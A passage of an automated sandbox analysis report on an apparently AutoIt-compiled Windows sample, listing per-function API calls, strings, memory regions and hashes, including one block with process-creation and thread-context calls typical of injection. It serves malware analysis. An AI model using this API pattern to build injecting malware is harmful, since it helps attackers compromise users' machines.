                                                          • Opcode Fuzzy Hash: 0b4f1cbb18cfb767acc37d2d5100307916a8bf49bc581853fb8807a7d08009b0
                                                          • Instruction Fuzzy Hash: A831D031508304AFD732EB60DC46FEB77DCAF44304F50862AF5858A0E5DB709648CBA6
                                                          APIs
                                                            • Part of subcall function 00364DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E0F
                                                          • _free.LIBCMT ref: 0039E263
                                                          • _free.LIBCMT ref: 0039E2AA
                                                            • Part of subcall function 00366A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00366BAD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                          • API String ID: 2861923089-1757145024
                                                          • Opcode ID: caa8d8c60f7974c9e43bfe6201a84b3d397f41df2767534ced80b0b8711deac4
                                                          • Instruction ID: 246b9f00fd833590f6fd5535fa127cdf5788c2ef8c58c58bc2282e0fb0909f3b
                                                          • Opcode Fuzzy Hash: caa8d8c60f7974c9e43bfe6201a84b3d397f41df2767534ced80b0b8711deac4
                                                          • Instruction Fuzzy Hash: 6F917D71910219AFCF06EFA4CC919EEB7B8FF18314F10856AF815AB2A1DB71AD05CB50
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003635A1,SwapMouseButtons,00000004,?), ref: 003635D4
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003635A1,SwapMouseButtons,00000004,?,?,?,?,00362754), ref: 003635F5
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,003635A1,SwapMouseButtons,00000004,?,?,?,?,00362754), ref: 00363617
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 0ccbf5a3262365c73b5a93cb7ae379a8b60968733c627cd1418e107059a14b13
                                                          • Instruction ID: 6bd489419d3c3ed8422cb44f76042b42cbc3a17954c47e9c461e535b5484b183
                                                          • Opcode Fuzzy Hash: 0ccbf5a3262365c73b5a93cb7ae379a8b60968733c627cd1418e107059a14b13
                                                          • Instruction Fuzzy Hash: 79115771614218BFDB22CF68DC80EAEBBBCEF04740F018569F805DB214E2719F409BA4
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00E77F23
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E77FB9
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E77FDB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                          • Instruction ID: dfe1cb92d46d224f26ce234921644705ebed2e3d9403f2dadc8790ab3aeb56a8
                                                          • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                          • Instruction Fuzzy Hash: 01621C30A14658DBEB24CBA4C954BDEB372EF58300F1091A9D10DFB3A1EB759E81CB59
                                                          APIs
                                                            • Part of subcall function 00364EE5: _fseek.LIBCMT ref: 00364EFD
                                                            • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9824
                                                            • Part of subcall function 003C9734: _wcscmp.LIBCMT ref: 003C9837
                                                          • _free.LIBCMT ref: 003C96A2
                                                          • _free.LIBCMT ref: 003C96A9
                                                          • _free.LIBCMT ref: 003C9714
                                                            • Part of subcall function 00382D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00389A24), ref: 00382D69
                                                            • Part of subcall function 00382D55: GetLastError.KERNEL32(00000000,?,00389A24), ref: 00382D7B
                                                          • _free.LIBCMT ref: 003C971C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID:
                                                          • API String ID: 1552873950-0
                                                          • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                          • Instruction ID: 1ffa577895b785983435910fbad7f3b613eef6d86ef4971d665a4796a529bb4d
                                                          • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                          • Instruction Fuzzy Hash: 26512BB1D04258AFDF269F64CC85B9EBBB9EF48300F10449EF609AB251DB715E908F58
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                          • Instruction ID: 5f536ce81fc6121791bbb0591d85efc12f60ed5ab336dc9770998ea1102441e4
                                                          • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                          • Instruction Fuzzy Hash: 7B41E634A007479BDF1AEF69C8809AE77A6EF81364B2581BDF825CBE40E771DD408B40
                                                          APIs
                                                          • _memset.LIBCMT ref: 003644CF
                                                            • Part of subcall function 0036407C: _memset.LIBCMT ref: 003640FC
                                                            • Part of subcall function 0036407C: _wcscpy.LIBCMT ref: 00364150
                                                            • Part of subcall function 0036407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00364160
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00364524
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00364533
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0039D4B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: 29f6c9934b97cbdeee32ce41991d4abac0794c391274faabd15cc50227228fa6
                                                          • Instruction ID: 2a7467fb96c510b4d12e7aa21bf7577e624b485726297da926add9d9a2417aa1
                                                          • Opcode Fuzzy Hash: 29f6c9934b97cbdeee32ce41991d4abac0794c391274faabd15cc50227228fa6
                                                          • Instruction Fuzzy Hash: A12107709047849FEB338B25984ABE7BBEC9F02314F04409DE79E5B181C7742A84CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: AU3!P/?$EA06
                                                          • API String ID: 4104443479-2942601680
                                                          • Opcode ID: 073439a972bf8af85ff808ca8981270441ead085f150eac40f36de6bf2025d90
                                                          • Instruction ID: 1fd43877a57a9342a21cc5129cc06489106c518e8b3753e7392dd79d5da887e6
                                                          • Opcode Fuzzy Hash: 073439a972bf8af85ff808ca8981270441ead085f150eac40f36de6bf2025d90
                                                          • Instruction Fuzzy Hash: 5C414C21E041586BDF239B64C8617BF7FA6DB46300F68C475ED829F28FD6319D4483A1
                                                          APIs
                                                          • _memset.LIBCMT ref: 0039EA39
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0039EA83
                                                            • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                            • Part of subcall function 00380791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: 08e7c50e9c84cc8d975f68b2e12c73088f5e3d4ad25a7e5fc94c340ade763e52
                                                          • Instruction ID: f05197229de63c03821d0e035311a8b448a0dbf0b19e096cea8beeb08ebf2e9d
                                                          • Opcode Fuzzy Hash: 08e7c50e9c84cc8d975f68b2e12c73088f5e3d4ad25a7e5fc94c340ade763e52
                                                          • Instruction Fuzzy Hash: 9D219071A002589BCF52DF94D845BEE7BFCAF49714F00805AE408AB281DBF859898FA1
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 003C98F8
                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003C990F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Temp$FileNamePath
                                                          • String ID: aut
                                                          • API String ID: 3285503233-3010740371
                                                          • Opcode ID: f37f65b28a0601b194858a0e7bf8f79f55787c39532236dd80b09ae3f5146a08
                                                          • Instruction ID: 3b4dcdedd6529c0b9b9aafea56993148c35565e92ca5376c7f22f703c5fc3ec7
                                                          • Opcode Fuzzy Hash: f37f65b28a0601b194858a0e7bf8f79f55787c39532236dd80b09ae3f5146a08
                                                          • Instruction Fuzzy Hash: 16D05E7954030DAFDB60ABA4DC8EFEA773CE704700F0007B1BB54990E1EBB095988B95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14fbf2fe84fe281921f9a1b000b6b740320a8d30e4f355b905e3aa24fcb395ab
                                                          • Instruction ID: 9373082971ecb5d8e4107c82cec66502bd88a02844b64342e3198bf61d4578a5
                                                          • Opcode Fuzzy Hash: 14fbf2fe84fe281921f9a1b000b6b740320a8d30e4f355b905e3aa24fcb395ab
                                                          • Instruction Fuzzy Hash: C3F138B16183019FCB15DF28D480A6ABBE9FF89314F15892EF8999B351D730E945CF82
                                                          APIs
                                                          • _memset.LIBCMT ref: 00364370
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00364415
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00364432
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_$_memset
                                                          • String ID:
                                                          • API String ID: 1505330794-0
                                                          • Opcode ID: f9de4c4213b7f5ee76ce85fd8dc61fbd59fe92b651dc7b2b2838cae9be824b04
                                                          • Instruction ID: d1ff23cb32d91d49ac15ebc27394f24345fe770eff92e1489eb44f25e50bd257
                                                          • Opcode Fuzzy Hash: f9de4c4213b7f5ee76ce85fd8dc61fbd59fe92b651dc7b2b2838cae9be824b04
                                                          • Instruction Fuzzy Hash: FF3191B4A04701CFC732DF25D885A9BBBF8FB48309F00493EE59A86291E770A944CB56
                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 00385733
                                                            • Part of subcall function 0038A16B: __NMSG_WRITE.LIBCMT ref: 0038A192
                                                            • Part of subcall function 0038A16B: __NMSG_WRITE.LIBCMT ref: 0038A19C
                                                          • __NMSG_WRITE.LIBCMT ref: 0038573A
                                                            • Part of subcall function 0038A1C8: GetModuleFileNameW.KERNEL32(00000000,004233BA,00000104,?,00000001,00000000), ref: 0038A25A
                                                            • Part of subcall function 0038A1C8: ___crtMessageBoxW.LIBCMT ref: 0038A308
                                                            • Part of subcall function 0038309F: ___crtCorExitProcess.LIBCMT ref: 003830A5
                                                            • Part of subcall function 0038309F: ExitProcess.KERNEL32 ref: 003830AE
                                                            • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                          • RtlAllocateHeap.NTDLL(00DF0000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: 32f07cfdee57f52e9792b64e64da774349c5a4c70a40a35a4b6d4488d3bf08ee
                                                          • Instruction ID: 62a69dcd647fced57177c00f0697de00f798e7739de1bbeb6853785cc8d9e51e
                                                          • Opcode Fuzzy Hash: 32f07cfdee57f52e9792b64e64da774349c5a4c70a40a35a4b6d4488d3bf08ee
                                                          • Instruction Fuzzy Hash: C101B175340B01DAE6233B38EC82A2E739C9B82762F6145FAF5059E2C1DFB49C414765
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003C9548,?,?,?,?,?,00000004), ref: 003C98BB
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003C9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003C98D1
                                                          • CloseHandle.KERNEL32(00000000,?,003C9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003C98D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: 070aa61eeef2d7fdb7edc87070267b15dc0112d98e2f3a6396458671afe95181
                                                          • Instruction ID: 6135cbd23bc18e7fe1cd8876873d322a6cf0d9cd3287494e59688c9c177b3d3c
                                                          • Opcode Fuzzy Hash: 070aa61eeef2d7fdb7edc87070267b15dc0112d98e2f3a6396458671afe95181
                                                          • Instruction Fuzzy Hash: 29E04F32140218BBDB321B54EC49F9A7B19AB06761F118220FB14A90E087B119119798
                                                          APIs
                                                          • _free.LIBCMT ref: 003C8D1B
                                                            • Part of subcall function 00382D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00389A24), ref: 00382D69
                                                            • Part of subcall function 00382D55: GetLastError.KERNEL32(00000000,?,00389A24), ref: 00382D7B
                                                          • _free.LIBCMT ref: 003C8D2C
                                                          • _free.LIBCMT ref: 003C8D3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                          • Instruction ID: f5f8503ce71bb0d127822cfdf3c775b001977c6d61ee6abb72f20e7657a38a92
                                                          • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                          • Instruction Fuzzy Hash: DFE012B1601B014ACB26B678AA44F9357EC4F98352715095DB41EDB186CE64FD468324
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CALL
                                                          • API String ID: 0-4196123274
                                                          • Opcode ID: 8a2bd71877d8ec7f43edb8e82214301983a18340d2426ea9cf61d9766fc74d41
                                                          • Instruction ID: c1594d96c9514b29438dbbf19723f670dd3294be334bf64b5be33c037053a66c
                                                          • Opcode Fuzzy Hash: 8a2bd71877d8ec7f43edb8e82214301983a18340d2426ea9cf61d9766fc74d41
                                                          • Instruction Fuzzy Hash: 44225670508700DFCB26DF24C490A6ABBE5BF85304F15C96DE88A9B666D735EC85CF82
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 059574cf47bda8725b60555c6bc87727ac0702e8c5106250e102d0fb1eb030cd
                                                          • Instruction ID: 738e4847515845eba7a1ed2c095a9496eba8d27a753ea82b3fd15ff235e2d18e
                                                          • Opcode Fuzzy Hash: 059574cf47bda8725b60555c6bc87727ac0702e8c5106250e102d0fb1eb030cd
                                                          • Instruction Fuzzy Hash: F641D5715087059BCB16EFA8D886EBAB7E8EF09300B24445DE685DB342DF35AD05DB60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: aa52f996f6a1e8cebf2e93e85435818c4b1739226e09e342898e130c21d93d86
                                                          • Instruction ID: 104a360ddf9b9cecb89ceb5e3ef0003d9ff947073bd2b875999681f6295c7868
                                                          • Opcode Fuzzy Hash: aa52f996f6a1e8cebf2e93e85435818c4b1739226e09e342898e130c21d93d86
                                                          • Instruction Fuzzy Hash: 1431D4B1604A06AFC705DF68C8D1E69F3A9FF48324755C629E429CB791EB30E924CB90
                                                          APIs
                                                            • Part of subcall function 0038571C: __FF_MSGBANNER.LIBCMT ref: 00385733
                                                            • Part of subcall function 0038571C: __NMSG_WRITE.LIBCMT ref: 0038573A
                                                            • Part of subcall function 0038571C: RtlAllocateHeap.NTDLL(00DF0000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F
                                                          • std::exception::exception.LIBCMT ref: 00380DEC
                                                          • __CxxThrowException@8.LIBCMT ref: 00380E01
